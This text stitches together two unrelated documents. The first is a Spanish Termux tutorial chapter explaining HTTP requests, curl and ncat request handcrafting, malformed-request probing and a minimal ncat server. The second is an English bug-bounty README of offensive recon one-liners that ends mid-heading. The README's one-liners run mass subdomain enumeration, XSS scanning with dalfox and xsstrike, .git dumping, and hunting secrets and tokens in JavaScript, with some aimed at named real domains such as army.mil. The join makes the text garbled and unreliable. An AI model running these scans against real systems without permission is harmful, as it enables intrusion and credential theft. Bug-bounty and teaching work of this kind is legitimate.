[https://github.com/stringmanolo/tgbot.sh](https://github.com/stringmanolo/tgbot.sh)_, esa versión carga el token y la contraseña de archivos llamados token.txt y password.txt que se encuentren en la misma carpeta que el programa. En el repositorio se encuentran las instrucciones, que son prácticamente idénticas que estas._ Aquí tienes un video de la versión en inglés del bot en funcionamiento: [![Videoturorial image preview](https://raw.githubusercontent.com/StringManolo/tgbot.sh/master/images/tgbotshvideopreview.jpg)](https://youtu.be/-_QyXqj41-Q) [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 25: Protocolo HTTP HyperText Transfer Protocol (HTTP) en español Protocolo de transferencia de hipertexto es un protocolo de transferencia de datos que permite la comunicación entre un servidor y un cliente. _Un protocolo es un conjunto de reglas que definen la forma de interacción entre el cliente y el servidor._ Es el idioma fundamental de la web. Cuando introduces una url en el navegador este establece un tunel con el servidor web y le envia la petición HTTP. Esta petición incluye información sobre el recurso que se quiere solicitar, por ejemplo el index.html, que es el contenido que se quiere mostrar en el navegador. ##### Petición HTTP ```http GET / HTTP/1.1 Host: example.com ``` Vamos a explicar que es cada apartado: - El primer apartado es el _método_, en este caso GET que en español significa OBTÉN. Los métodos le dicen al servidor que tipo de operación queremos realizar, en este caso con GET le decimos que queremos *obtener* un recurso. Si usásemos por ejemplo el método POST le indicaríamos que queremos enviarle información al servidor. - El segundo apartado es la path o _ruta_ que le indica cual es el recurso/la ubicación del recurso que queremos obtener. Cuando utilizamos / (un directorio/carpeta) el servidor busca automáticamente si existe un index.html en dicha carpeta. Si usásemos /imagenes/foto.jpg buscaría foto.jpg dentro de la carpeta imagenes. - El tercer apartado es la _versión del protocolo_ Hay distinas versiones del protocolo http, cada una con sus normas específicas, pero por lo general son todas casi idénticas. Estos tres apartados siempre deben aparecer en la primera linea de la petición seguidos de un salto de linea. Esta linea se conoce como Request Line (linea de solicitud). Tras la linea de solicitud van las cabeceras de la petición, cada cabecera se compone por el _nombre del encabezado_ dos puntos (_:_) y el _valor del encabezado_. En este caso el nombre del encabezado es Host y el valor es example.com. Esta cabecera sirve para indicarle al servidor web el nombre del dominio al que estamos realizando la petición. Es importante porque un mismo servidor puede tener alojadas cientos de páginas webs distintas de dominios distintos, lo que usualmente se conoce como hosting/hosting compartido. Si no le ponemos la cabecera host el servidor web no tiene forma de saber que página de las que tiene alojadas es la que estamos solicitando. Tras el primer encabezado puedes añadir todas las cabeceras que quieras. Una vez incluiste todos los encabezados debes añadir 2 saltos de linea al final de la petición para indicar el final de la misma. Esta petición es enviada al servidor mediante un tunel de red que se ha establecido utilizando la IP y una vez llega al servidor, este la lee y responde en consecuencia en base a lo que tu le indicaste en dicha petición. Si por ejemplo le pediste una imagen, la buscará en la carpeta imagenes, la leera y te enviará una respuesta HTTP en la que al final de la misma viene la imagen. Antes de ver como son las respuestas http, veremos cuales son los métodos y cabeceras mas comunes. ###### Métodos HTTP Los métodos mas comunes son: - *GET*: Solicita datos de un recurso específico en el servidor. Se utiliza para recuperar información y no debe tener efectos secundarios en el servidor. - *POST*: Envía datos al servidor para ser procesados. Se utiliza para enviar información que el servidor debe manejar, como enviar datos de un formulario. - *PUT*: Actualiza un recurso existente en el servidor. Se utiliza para modificar o reemplazar completamente un recurso en el servidor. - *DELETE*: Elimina un recurso en el servidor. Se utiliza para solicitar la eliminación de un recurso específico. - *PATCH*: Aplica modificaciones parciales a un recurso existente en el servidor. Permite actualizar solo partes específicas de un recurso. - *HEAD*: Similar a GET, pero solicita solo los encabezados del recurso sin el cuerpo de la respuesta. Se utiliza para obtener información sobre el recurso sin descargar su contenido completo. - *OPTIONS*: Solicita información sobre las capacidades de comunicación del servidor. Permite al cliente averiguar qué métodos o encabezados son admitidos por el servidor. - *CONNECT*: Se utiliza para establecer una conexión en red con el recurso identificado por la URI. A menudo se utiliza para establecer una conexión segura a través de un proxy. - *TRACE*: Realiza una solicitud de bucle de retorno al servidor. Se utiliza para probar y depurar la ruta de la solicitud a través de varios servidores. Otros métodos mas o menos establecidos con los que te puedes encontrar pero que son menos comunes son: COPY, MOVE, LINK, UNLINK, LOCK, UNLOCK, PURGE, REBIND y SEARCH. Su uso es tan infrecuente que no merece la pena comentar para que sirven, solo con que tengas conocimiento de la existencia de otros métodos es suficiente. ###### Cabeceras HTTP Las cabeceras http mas comunes son: - *Host*: Indica el nombre de dominio del servidor al que se está haciendo la solicitud. - *User-Agent*: Identifica el software y la versión utilizados por el cliente. - *Accept*: Especifica los tipos de contenido que el cliente está dispuesto a aceptar. - *Content-Type*: Indica el tipo de contenido en el cuerpo de la petición o respuesta. - *Authorization*: Proporciona credenciales de autenticación para acceder a recursos protegidos. - *Cookie*: Envia información de cookies almacenada previamente por el servidor. - *Cache-Control*: Controla el almacenamiento en caché de la respuesta en el cliente o el servidor. - *Content-Length*: Indica la longitud del cuerpo de la solicitud o respuesta en bytes. - *Origin*: Indica la URL de origen de una solicitud de recursos cruzados (CORS). - *Referer (Referer)*: Indica la URL de la página desde la cual se originó la solicitud. - *User-Agent*: Identifica el software del cliente, como un navegador o una aplicación. - *If-None-Match*: Permite la validación de la caché condicional utilizando una entidad de etag. - *If-Modified-Since*: Permite la validación de la caché condicional utilizando una fecha. - *Accept-Language*: Indica las preferencias de idioma del cliente para la respuesta. - *Accept-Encoding*: Indica las codificaciones de contenido que el cliente acepta. - *Connection*: Controla si la conexión al servidor debe mantenerse abierta o cerrarse. Al contrario que con los métodos que solo unos pocos son comunes, con las cabeceras hay decenas de ellas que se usan frecuentemente, aquí solo se comentan las más típicas, pero hay muchas más y si te las encuentras tendrás que buscar que hace cada una. ###### Handcrafting (construcción manual) Un término común en hacking es el handcrafting de peticiones. Se refiere al hecho de nosotros escribir a mano las cabeceras http en lugar de usar una heramienta como pueda ser un navegador para que lo haga todo automático. Esto nos permite controlar con detalle exactamente lo que queremos enviar, por ejemplo si queremos mandar caracteres raros para probar si el servidor funciona correctamente o si por el contrario crashea (peta, detiene la ejecución). Hay múltiples herramientas que nos permiten enviar peticiones HTTP desde la terminal. Una similar a un navegador es curl. Instálala con el comando: ```bash pkg install curl ``` Curl nos permite enviar y construir las peticiones HTTP de forma automática pero nos da la opción de modificar sus campos. Esto está bien si queremos interactuar con el servidor de forma correcta. Por ejemplo si quieres solicitar la web de example.com usas el comando: ```bash curl 'http://example.com' ``` Curl lo que hace es crear automáticamente la petición y enviarla al servidor. Con el comando anterior curl enviará la siguiente petición: ```http GET / HTTP/1.1 Host: example.com User-Agent: curl/7.82.0 Accept: */* ``` Si quieres editar las cabeceras puedes usar el argumento -H. ```bash curl 'http://example.com' -H 'User-Agent: Mozilla/5.0' ``` Curl creará la siguiente petición: ```http GET / HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Accept: */* ``` Si quieres cambiar el método puedes usar el argumento -X: ```bash curl 'http://example.com' -X 'PUT' ``` Curl creará la siguiente petición: ```http PUT / HTTP/1.1 Host: example.com User-Agent: curl/7.82.0 Accept: */* ``` Curl tiene muchísimas opciones. Es muy buena herramienta para un uso normal. En cambio si queremos tener total control de lo enviado podemos usar otras herramientas. Mi favorita es ncat. Ncat te permite enviar lo que tu escribas. Viene con el paquete de nmap asique para instalar ncat usaremos el comando: ```bash pkg install nmap ``` Para enviar una petición HTTP con ncat podemos escribirla primero en un archivo con un editor de texto y hacer cat del archivo y pasárselo a ncat o directamente con el comando echo de bash: ```bash echo 'GET / HTTP/1.1 Host: example.com ' | ncat example.com 80 ``` ncat nos permitirá poner cualquier cosa, lo cual puede ser muy útil para testear la seguridad de un servidor web. Por ejemplo podríamos enviar la siguiente petición: ```bash echo '/ GET HTTP/1.1 Host: example.com ' | ncat example.com 80 ``` El servidor nos responderá con una respuesta código de error 501 (Not Implemented) que indica que el método */* no lo ha implementado el servidor, es decir que el servidor no reconoce ese método, ya que solo reconoce GET, HEAD, ... pero no / De esto podríamos inferir que lo que está haciendo es tomar lo primero que le mandamos antes de un espacio y entiende que eso es el método de la petición, lo que nos puede llevar a la pregunta de, y si en lugar de GET o / que pasaría si le ponemos un espacio? ```bash echo ' / HTTP/1.1 Host: example.com ' | ncat example.com 80 ``` Y efectivamente, si no encuentra GET u otro método valido nos seguirá respondiendo que el que le pasamos no está implementado. Hay programas que hacen esto automáticamente, se les conoce como fuzzers y son muy útiles para encontrar fallos de seguridad. *IMPORTANTE*: Estas pruebas se realizan únicamente con fines educativos, el uso de estas técnicas de testing sin que te de permiso el dueño del servidor, es ilegal, ya que imagínate que enviándole una petición malformada el servidor no sabe como responder y se congela su proceso. El dueño del servidor podría denunciarte porque le has dejado el servidor fuera de servicio y el resto de visitantes no han podido acceder. A demás de ser un delito informático también puede ocasionarle costes a la empresa del servidor, por ejemplo podrían dejar de ganar dinero con anuncios ya que la web no está disponible y tener que invertir el tiempo de sus empleados en revisar la petición, corregir el fallo y volver a poner el servidor online. Estarían en su derecho de demandarte y solicitarte como compensación que abones dichos costes. En resumen, cárcel y multa. Asique para este tipo de pruebas utiliza tus propias webs y servidores en local, así podrás testear en ellas todo lo que quieras sin perjudicar a nadie. En el [Capítulo 18: Creando un Servidor](#cap%C3%ADtulo-18-creando-un-servidor) ya se explicó como crear un servidor web en local con python3. En los siguientes apartados de este capítulo también veremos como hacerlo con ncat. ###### Parámetros HTTP Los parámetros http sirven para enviar información adicional, por ejemplo podrías indicarle al servidor el idioma en que quieres que te devuelva cierto recurso. O para hacer login en la página web podrías enviarle tu usuario y contraseña. Hay 2 formas de enviar los parámetros y podemos clasificarlos según que parte de la petición utilicemos para enviarlos. _Parámetros de consulta_ o _parámetros en el cuerpo de la petición_. - Parámetros de consulta Si alguna vez te fijaste en la url/enlace de Google tras buscar algo verías que entre otros parámetros contiene uno llamado q. Por ejemplo https://www.google.com/search?q=termux *q* viene de la palabra *q*uery en español consulta. Para indicar que vamos a pasar parámetros a un recurso se utiliza el símbolo de cierre de interrogación. Después indicamos el nombre del parámetro, (en este caso google usa *q*) seguido de un *=* y del valor de dicho parámetro que en este caso es lo que queremos buscar en google. Si lo pones en el navegador verás que te lleva a la búsqueda de la palabra termux en Google. Si quieres pasar mas de un parámetro tienes que usar *&* como separador para que el servidor sepa donde acaba un parámetro y donde empieza el siguiente. Por ejemplo si quieres que solo te responda páginas en inglés google utiliza el parámetro lr (language response en español idioma de respuesta) y como valor utiliza lang_país por ejemplo para inglés la url sería: https://www.google.com/search?q=termux&lr=lang_en para español sería https://www.google.com/search?q=termux&lr=lang_es para frances lang_fr, para portugués lang_pt, etc. _No hay una estandarización de que parámetros utilizar o que nombres deben tener, es decir, que cada web utiliza lo que le da la gana. Por ejemplo Google usa ese formato de lr=lang_es para los idiomas mientras que otra página puede usar lang=spanish, otra idioma=francés, otra l=1, etc._ Como puedes deducir para enviar estos parámetros en una petición HTTP usamos el apartado de la ruta: ```bash echo 'GET /search?q=termux&lr_lang_es HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 Accept: */* ' | ncat google.com 80 ``` - Parámetros en el cuerpo de la petición Los parámetros en el cuerpo de la petición se suelen utilizar con el método POST y normalmente son parámetros que no queremos que se vean en la url. Por ejemplo si estamos en un lugar público no nos gustaría que nuestra contraseña saliese en la url del navegador como pasaba con la búsqueda en Google. Entonces lo que hacemos es enviarlos después de las cabeceras. Este espacio después de las cabceras es lo que se conoce como _cuerpo de la petición_. La petición anterior se vería de la siguiente forma si usamos el cuerpo de la petición en lugar de la ruta: ```bash echo 'GET /search HTTP/1.1 Host: www.google.com q=Termux&lr=lang_es ' | ncat google.com 80 ``` Si haces esta petición veras que Google te responde con el Error 400 Bad Request (mala petición) y es que muchos servidores no admiten que envies el cuerpo de la petición con el método GET. El equivalente usando POST sería: ```bash echo 'POST /search HTTP/1.1 Host: www.google.com Content-Type: application/x-www-form-urlencoded Content-Length: 19 q=Termux&lr=lang_es ' | ncat google.com 80 ``` Si vemos la respuesta de google nos dice 405 Method Not Allowed (metodo no permitido), es decir, google.com/search en este caso no acepta que le hagamos las consultas por POST. Eso ya es decisión de cada web. Otros buscadores como duckduckgo si que permiten tanto la búsqueda por parámetros en GET como por POST Aquí el ejemplo de muestra de como duckduckgo si que acepta que le enviemos el parámetro en el cuerpo de la petición: ```bash echo 'POST / HTTP/1.1 Host: duckduckgo.com Content-Type: application/x-www-form-urlencoded Content-Length: 8 q=Termux ' | ncat duckduckgo.com 80 ``` Como ya comentamos anteriormente para realizar este tipo de peticiones "correctas" puedes utilizar curl, ya que es mas sencillo: ```bash curl -v 'https://duckduckgo.com/?q=termux' ``` Cuando necesites mas control es cuando debes usar el crafting manual de las peticiones con ncat. ##### Respuesta HTTP Cuando realizamos una petición HTTP el servidor también nos responde utilizando el protocolo HTTP. Por ejemplo si hacemos la petición: ```bash echo 'GET / HTTP/1.1 Host: example.com ' | ncat example.com 80 ``` El servidor web ubicado en example.com puerto 80 nos responderá lo siguiente: ```http HTTP/1.1 200 OK Age: 425281 Cache-Control: max-age=604800 Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Aug 2023 15:31:53 GMT Etag: "3147526947+ident" Expires: Wed, 16 Aug 2023 15:31:53 GMT Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT Server: ECS (dcb/7FA5) Vary: Accept-Encoding X-Cache: HIT Content-Length: 1256 <!doctype html> <html> <head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head> <body> <div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org/domains/example">More information...</a></p> </div> </body> </html> ``` Como puedes observar la primera linea nos indica la versión del protocolo con la que nos responde, un número que se conoce como _código de estado_ y una descripción corta en texto con lo que significa ese código _frase de estado_. Por ejemplo 200 nos dice que todo está OK, que en respuesta a GET suele significar que encontró el rescurso que le pedimos (el /index.html). Otro código de respuesta muy conocido es el 404 Not Found (no encontrado que nos suele aparecer cuando solicitamos un recurso que no existe en el servidor. A partir de ahí también nos responde con cabeceras. Vamos a ver que significa cada una de las cabeceras que nos envió: - *Age*: Indica cuánto tiempo ha pasado desde que la respuesta fue generada por el servidor (en segundos). - *Cache-Control*: Especifica las directivas de control de caché que deben aplicarse tanto a la solicitud como a la respuesta. En este caso, `max-age=604800` indica que el contenido se puede almacenar en caché durante 604800 segundos (7 días). - *Content-Type*: Indica el tipo de contenido del cuerpo de la respuesta. En este caso, `text/html; charset=UTF-8` indica que el contenido es HTML con codificación UTF-8. - *Date*: Muestra la fecha y hora en que se generó la respuesta. - *Etag*: Proporciona una etiqueta que identifica única e individualmente la versión actual del recurso. Se utiliza para la validación de la caché condicional. - *Expires*: Indica la fecha y hora en que expira el contenido almacenado en caché. - *Last-Modified*: Muestra la fecha y hora en que se modificó por última vez el recurso en el servidor. - *Server*: Indica el software del servidor que respondió a la solicitud. - *Vary*: Indica qué encabezados de solicitud se utilizaron para determinar la respuesta almacenada en caché. En este caso, `Accept-Encoding` indica que la respuesta puede variar según la codificación de contenido aceptada. - *X-Cache*: Proporciona información sobre el estado de la caché en el servidor. `HIT` indica que la respuesta se sirvió desde la caché. - *Content-Length*: Indica la longitud del cuerpo de la respuesta en bytes. Mas o menos equivale al número de caracteres que tiene el archivo que le solicitamos. Tras las cabeceras de respuesta se incluye el contenido del archivo solicitado, en este caso es el index.html de la página example.com. Si lo guardas y lo abres en un navegador verás la web de example.com ##### HTTPS Ya sabes que es HTTP, pero entonces que es HTTPS, otro protocolo? En verdad no, cuando nos referimos a HTTPS nos estamos refieriendo a HTTP pero enviado en un tunel seguro. Si conectamos directamente a un servidor por ejemplo con el comando ncat example.com 80 estamos estableciendo un tunel TCP/IP con el servidor de example.com por el cual mandaremos el mensaje siguiendo el protocolo HTTP. El puerto 80 es el puerto por defecto para el protocolo HTTP sin cifrar, si queremos establecer un canal cifrado usaremos el puerto 443. Por ejemplo: ```bash echo 'GET / HTTP/1.1 Host: example.com ' | ncat example.com 443 ``` Si hacemos esto sin más estaremos enviando una petición HTTP sin cifrar a un tunel que requiere cifrado y el servidor o cerrará el tunel TCP sin respondernos o nos avisará que estamos enviando texto sin cifrar. En el caso concreto de example.com simplemente cierra el tunel y ncat nos avisará con el mensaje: *Ncat: Connection reset by peer.* en español *Ncat: Conexión restablecida por la otra parte*. Es decir, la otra parte de la comunicación (el servidor de example.com) nos cerró la conexión (tunel) porque le enviamos texto sin cifrar en lugar de negociar el cifrado. La parte de negociación del cifrado es un tema complejo que pertenece al protocolo TLS y no tiene que ver con el protocolo HTTP, asique no es algo que corresponda explicar en este capítulo. Si quieres usar un tunel cifrado simplemente añade la flag --ssl al comando ncat y el programa se encargará automáticamente de negociar el cifrado. ```bash echo 'GET / HTTP/1.1 Host: example.com ' | ncat example.com 443 --ssl ``` Verás la misma respuesta si utilizas http en el puerto 80 que si utilizas https en el puerto 443, la diferencia es que el mensaje viaja cifrado, esto quiere decir que si alguien te está espiando en el wi-fi en lugar de ver las peticiones tal como tu las escribes verá "caracteres sin sentido" (el tráfico cifrado). Asique siempre que puedas utiliza https ya que es lo mismo pero en lugar de usar un tunel sin cifrado, las peticiones y respuestas van cifradas y solo tú y example.com teneis las contraseñas para descifrarlas. Aquí un resumen de lo que pasa cuando utilizas la flag --ssl: 1. El cliente (ncat) se conecta al servidor en el puerto 443. 2. El servidor responde con su certificado digital. 3. El cliente verifica la autenticidad del certificado. 4. El cliente y el servidor intercambian información para acordar el cifrado y la clave. 5. Se genera una clave de sesión para cifrar y descifrar los datos. 6. Una vez establecida la conexión segura, el cliente y el servidor pueden intercambiar datos cifrados. ##### Servidor Web mínimo A parte de enviar peticiones a un servidor, podemos crear un servidor mínimo que nos responda a las peticiones, ncat nos sirve para hacer una versión mínima de HTTP. ```bash #!/usr/bin/env bash # Puerto en el que escuchará el servidor web PUERTO=8080 # Función para manejar las solicitudes HTTP manejar_solicitud() { cat index.html } # Iniciar el servidor web while true; do respuesta=$(manejar_solicitud) echo -ne "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n$respuesta\r\n" | ncat -lk -p $PUERTO done ``` Puedes guardar este archivo como servidor_web.sh darle permisos y ejecutarlo con el comando: ```bash chmod 775 ./servidor_web.sh ./servidor_web.sh ``` Ahora podrás interactuar con él en el puerto 8080. Como ves en su código lo único que hace es enviar siempre la misma respuesta. Si tienes un archivo index.html te lo enviará en la respuesta. Puedes probar a crear el index.html con el comando: ```bash echo '<h1>Esta es mi web de ejemplo</h1>' > index.html ``` Y ahora puedes verla desde el navegador visitando la URL http://localhost:8080 o http://127.0.0.1:8080 También puedes usar url o ncat desde otra sesión de la terminal en lugar del navegador. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 26: Protocolo DNS [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 27: Servicios Web [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 28: Hosting Gratuitos [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 29: Dominios Gratuitos [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 30: Introducción a Programación [Tabla de Contenidos](#tabla-de-contenidos) ----
## 👑 What is KingOfBugBounty Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. Want to earn 100 dollars using my code on ocean-digital? [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) My course PT-BR = https://ofjaaah.com ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Axiom](https://github.com/pry0cc/axiom) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) ### .bashrc shortcut. ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - 